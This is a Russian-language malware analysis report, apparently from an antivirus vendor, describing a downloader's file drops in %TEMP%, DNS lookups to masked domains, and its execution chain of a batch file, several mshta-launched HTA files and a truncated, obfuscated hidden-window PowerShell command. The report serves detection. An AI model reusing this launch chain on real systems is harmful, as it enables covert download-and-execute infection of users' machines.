Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\fc58.tmp\start2.bat
- %TEMP%\fc58.tmp\ba1.hta
- %TEMP%\fc58.tmp\m.hta
- %TEMP%\fc58.tmp\m1.hta
- %TEMP%\fc58.tmp\b.hta
- %TEMP%\fc58.tmp\b1.hta
- %TEMP%\fc58.tmp\ba.hta
- %TEMP%\fc58.tmp\setup.exe
Удаляет следующие файлы
- %TEMP%\fc58.tmp\start2.bat
Сетевая активность
UDP
- DNS ASK pa###isdvzxc.ru
- DNS ASK bi#.do
- DNS ASK ma###skds.ug
- DNS ASK ti##url.com
- DNS ASK as###dasrdc.ug
- DNS ASK cu#t.ly
Другое
Создает и запускает на исполнение
- '%TEMP%\fc58.tmp\setup.exe'
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\FC58.tmp\start2.bat" <Полный путь к файлу>"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $s...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\FC58.tmp\start2.bat" <Полный путь к файлу>"
- '%WINDIR%\syswow64\timeout.exe' 1
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\FC58.tmp\m.hta"
- '%WINDIR%\syswow64\timeout.exe' 2
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\FC58.tmp\m1.hta"
- '%WINDIR%\syswow64\timeout.exe' 3
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\FC58.tmp\b.hta"
- '%WINDIR%\syswow64\timeout.exe' 4
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\FC58.tmp\b1.hta"
- '%WINDIR%\syswow64\timeout.exe' 5
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\FC58.tmp\ba.hta"
- '%WINDIR%\syswow64\timeout.exe' 6
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\FC58.tmp\ba1.hta"
